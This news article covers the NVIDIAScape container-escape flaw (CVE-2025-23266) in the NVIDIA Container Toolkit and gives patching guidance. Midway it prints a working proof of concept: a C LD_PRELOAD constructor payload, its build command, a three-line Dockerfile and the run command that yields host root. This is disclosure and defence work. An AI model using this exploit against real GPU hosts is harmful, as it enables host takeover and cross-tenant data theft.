Researchers Release PoC Exploit for High-Severity NVIDIA AI Toolkit Bug

Wiz Research has disclosed a severe vulnerability in the NVIDIA Container Toolkit (NCT), dubbed NVIDIAScape and tracked as CVE-2025-23266 with a CVSS score of 9.0, that enables malicious containers to escape isolation and gain root access on host systems.

This flaw, which stems from a misconfiguration in OCI hook handling, affects NCT versions up to and including 1.17.7 (CDI mode only for 1.17.5 and later) and NVIDIA GPU Operator versions up to and including 25.3.1.

Because the toolkit is a cornerstone of GPU-accelerated AI workloads in cloud environments, the vulnerability poses a systemic risk, potentially allowing attackers to compromise shared infrastructure and access sensitive data across multi-tenant setups.

Critical Container Escape Flaw

The exploit leverages the OCI runtime specification’s createContainer hooks, which NCT employs to configure container access to host NVIDIA drivers and GPUs.

Unlike prestart hooks, which run in a more isolated context, createContainer hooks inherit environment variables from the container image; under the OCI spec, they execute after the container’s mount namespace is set up but before pivot_root.

This inheritance exposes a critical weakness: attackers can manipulate variables like LD_PRELOAD to inject malicious shared objects into the privileged nvidia-ctk process.

With the hook’s working directory set to the container’s root filesystem, a simple path to a payload .so file suffices for execution.
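To make the mechanism concrete, such a payload can be an ordinary shared library whose constructor runs the moment the dynamic linker preloads it into the privileged hook process. The sketch below is illustrative only, reconstructed from the behavior described in this article rather than taken from the published PoC; the file name poc.c and the build command are assumptions.

    /* poc.c - illustrative LD_PRELOAD payload, not the published exploit.
     * The constructor fires when the library is preloaded into the
     * privileged nvidia-ctk hook, so its commands run as root on the host. */
    #include <stdlib.h>

    __attribute__((constructor))
    static void on_load(void) {
        /* Mirrors the PoC behavior described below: run `id` and record the result on the host. */
        system("id > /owned");
    }

Compiled into a shared object with something like gcc -shared -fPIC -o poc.so poc.c, the resulting poc.so only needs to be placed in the container image’s root directory.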

Demonstrating the vulnerability’s simplicity, Wiz released a proof-of-concept (PoC) exploit via a three-line Dockerfile: starting from a Busybox base, it sets LD_PRELOAD to /proc/self/cwd/poc.so and adds the malicious library.
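Based on that description, the image amounts to the following (a reconstruction from the article’s wording, not the verbatim PoC Dockerfile):

    FROM busybox
    ENV LD_PRELOAD=/proc/self/cwd/poc.so
    ADD poc.so /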

When the container is run with the NVIDIA runtime and GPU flags, the hook loads the payload and grants root privileges on the host; the sample PoC demonstrates this by executing ‘id’ and writing its output to /owned on the host filesystem.
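The invocation itself is unremarkable; something along these lines, where the image tag is arbitrary and --runtime=nvidia with --gpus all are the standard flags for requesting the NVIDIA runtime and GPU access, not necessarily Wiz’s exact command:

    docker build -t nvidiascape-poc .
    docker run --rm --runtime=nvidia --gpus all nvidiascape-poc
    cat /owned    # on the host: the output of `id`, run as root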

Root on the Host

This mirrors prior container escapes, such as Wiz’s earlier findings in Replicate and DigitalOcean, underscoring recurring flaws in AI supply chain security.

The issue is particularly acute in managed AI services on shared GPU clusters, where untrusted containers could enable data theft or model manipulation across customers.

Initial access vectors include social engineering, supply chain compromises, or the loading of an arbitrary attacker-supplied image, meaning exploitation does not require publicly exposed infrastructure.

According to the report, Wiz’s research builds on previous disclosures such as CVE-2024-0132 and is part of a broader effort highlighting vulnerabilities across AI stacks, from infrastructure providers like Hugging Face to tools like Ollama.

Patching Guidance for Secure AI Deployments

NVIDIA’s security bulletin urges immediate upgrades to patched NCT versions, with Wiz providing a Threat Intel Center query for identifying vulnerable instances.

Prioritization should focus on hosts running untrusted images, augmented by runtime validation to confirm active toolkit usage.
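As a quick first pass, the toolkit’s own CLI reports the installed version on a given host (assuming nvidia-ctk is on the PATH):

    nvidia-ctk --version    # 1.17.7 and earlier fall in the affected range described above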

For unpatchable systems, disable the enable-cuda-compat hook: in legacy NCT mode, edit /etc/nvidia-container-toolkit/config.toml to set features.disable-cuda-compat-lib-hook = true.
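In the TOML file, that flag lives under the features table, so the relevant fragment would look roughly like this (key name taken from the guidance above; other sections of the file omitted):

    # /etc/nvidia-container-toolkit/config.toml
    [features]
    disable-cuda-compat-lib-hook = true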

For GPU Operator deployments, append disable-cuda-compat-lib-hook to the NVIDIA_CONTAINER_TOOLKIT_OPT_IN_FEATURES environment variable via Helm arguments, or deploy toolkit v1.17.8 directly using a platform-specific tag such as ubuntu20.04 or ubi8.
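For the Helm route, a plausible invocation is sketched below; the toolkit.env and toolkit.version value paths are assumptions about the GPU Operator chart layout and should be verified against the chart’s documented values before use:

    # Opt in to the mitigation feature flag (values keys assumed)
    helm upgrade gpu-operator nvidia/gpu-operator -n gpu-operator \
      --set 'toolkit.env[0].name=NVIDIA_CONTAINER_TOOLKIT_OPT_IN_FEATURES' \
      --set 'toolkit.env[0].value=disable-cuda-compat-lib-hook'

    # Or pin the patched toolkit with a platform-specific tag
    helm upgrade gpu-operator nvidia/gpu-operator -n gpu-operator \
      --set toolkit.version=v1.17.8-ubuntu20.04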

The disclosure timeline began with Wiz’s report to NVIDIA on May 17, 2025, during Pwn2Own Berlin, culminating in the CVE assignment and bulletin on July 15, 2025, followed by this public release.

This vulnerability reinforces that AI security threats stem more from foundational infrastructure flaws than speculative AI-driven attacks, urging teams to enforce strict controls over model sources and container integrity in rapidly evolving AI pipelines.
